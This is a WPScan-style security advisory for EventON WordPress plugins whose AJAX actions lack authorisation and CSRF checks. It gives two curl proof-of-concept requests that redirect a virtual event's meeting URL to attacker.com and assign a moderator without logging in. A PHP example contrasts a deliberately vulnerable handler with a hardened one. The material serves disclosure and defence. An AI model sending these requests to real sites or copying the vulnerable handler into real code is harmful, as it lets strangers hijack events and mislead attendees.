wpvulndb | Erwan LR (WPScan) | WPVDB-ID: 73D1B00E-1F17-4D9A-BFC8-6BC43A46B90B
History: Jan 10, 2024 - 12:00 a.m.

EventON (Free < 2.2.9, Premium < 4.5.9) - Unauthenticated Virtual Event Settings Update

Tags: eventon, security, unauthenticated, virtual event, csrf, ajax, vulnerability

EPSS: 0.001 (Low), percentile 20.7%

Description

The plugins do not perform authorisation or CSRF checks in some AJAX actions, allowing unauthenticated users to update the settings of any virtual event, such as its meeting URL, moderator and access details.

PoC

To set the Meeting URL to https://attacker.com/ on the Virtual Event with ID 240:

    curl -X POST --data "event_id=240&_vir_url=https://attacker.com/" 'https://example.com/wp-admin/admin-ajax.php?action=eventon_save_virtual_event_settings'

To set the subscriber with user ID 5 as moderator of the Virtual Event with ID 240:

    curl -X POST --data "eid=240&_user_role=subscriber&_mod=5" 'https://example.com/wp-admin/admin-ajax.php?action=eventon_save_virtual_mod_settings'

Note that neither request carries an authentication cookie or a nonce; the actions are reachable by anyone who can reach admin-ajax.php.

v4.5.8 of the premium plugin added capability and CSRF checks; however, the nonce verification is flawed, so the issue can still be exploited via CSRF.
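As an added illustration (not EventON's code, and not the fix the vendor shipped), the WordPress AJAX handler shape that produces exactly this class of bug, placed next to a hardened version. The hook, action, nonce and meta-key names (demo_…, _vir_url, _mod, security) are assumptions for the demo; the hardened handler relies only on core WordPress functions: check_ajax_referer(), current_user_can(), user_can(), absint() and esc_url_raw().

```php
<?php
// Added example, not EventON's code. Shows how an admin-ajax.php action
// becomes reachable by anyone, and the checks that close both holes
// (missing authorisation and missing CSRF protection).

/* ---------- Vulnerable shape ---------------------------------------------
 * Hooking the handler on wp_ajax_nopriv_* exposes it to visitors with no
 * session at all; with no capability or nonce check, any POST carrying
 * event_id and _vir_url overwrites the meeting URL, exactly as the curl
 * commands in the PoC do.
 */
add_action( 'wp_ajax_nopriv_demo_save_virtual_event_settings', 'demo_vuln_save_virtual_settings' );
add_action( 'wp_ajax_demo_save_virtual_event_settings',        'demo_vuln_save_virtual_settings' );

function demo_vuln_save_virtual_settings() {
    $event_id = (int) $_POST['event_id'];
    // No authorisation, no nonce, no validation of the stored values.
    update_post_meta( $event_id, '_vir_url', $_POST['_vir_url'] );
    update_post_meta( $event_id, '_mod', (int) $_POST['_mod'] );
    wp_send_json_success();
}

/* ---------- Hardened shape ------------------------------------------------
 * 1. No nopriv hook: anonymous requests never reach the handler.
 * 2. check_ajax_referer() requires a nonce minted for THIS action and ends
 *    the request when it is absent or invalid, which blocks CSRF. A nonce
 *    that is checked but whose result is ignored, or one minted for an
 *    unrelated action, gives no protection.
 * 3. current_user_can( 'edit_post', $event_id ) ties the change to a user
 *    who may edit that specific event, so a subscriber cannot touch it.
 * 4. Inputs are validated before they are stored.
 */
add_action( 'wp_ajax_demo_save_virtual_event_settings', 'demo_safe_save_virtual_settings' );

function demo_safe_save_virtual_settings() {
    // 'security' is the assumed POST field carrying the nonce; the front-end
    // would obtain it from wp_create_nonce( 'demo_save_virtual_event' ).
    check_ajax_referer( 'demo_save_virtual_event', 'security' );

    $event_id = isset( $_POST['event_id'] ) ? absint( $_POST['event_id'] ) : 0;
    if ( ! $event_id || ! current_user_can( 'edit_post', $event_id ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    if ( isset( $_POST['_vir_url'] ) ) {
        // Only http(s) meeting URLs are accepted; anything else collapses to ''.
        $url = esc_url_raw( wp_unslash( $_POST['_vir_url'] ), array( 'http', 'https' ) );
        if ( '' === $url ) {
            wp_send_json_error( 'invalid meeting url', 400 );
        }
        update_post_meta( $event_id, '_vir_url', $url );
    }

    if ( isset( $_POST['_mod'] ) ) {
        $mod = absint( $_POST['_mod'] );
        // The moderator must be an existing user who can at least edit posts;
        // requiring 'edit_posts' here is an assumption for the demo.
        if ( ! get_userdata( $mod ) || ! user_can( $mod, 'edit_posts' ) ) {
            wp_send_json_error( 'invalid moderator', 400 );
        }
        update_post_meta( $event_id, '_mod', $mod );
    }

    wp_send_json_success();
}
```

The two curl commands from the PoC, replayed against the hardened handler, stop at check_ajax_referer() because they carry no nonce; a logged-in subscriber replaying them with a valid nonce stops at current_user_can(). Both checks are needed: the capability check alone leaves the CSRF path open, and the nonce check alone still lets any authenticated user edit any event.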

Fixed in

    CPE name              Operator   Version
    EventON (Premium)     eq         4.5.9
    EventON (Free)        eq         2.2.9

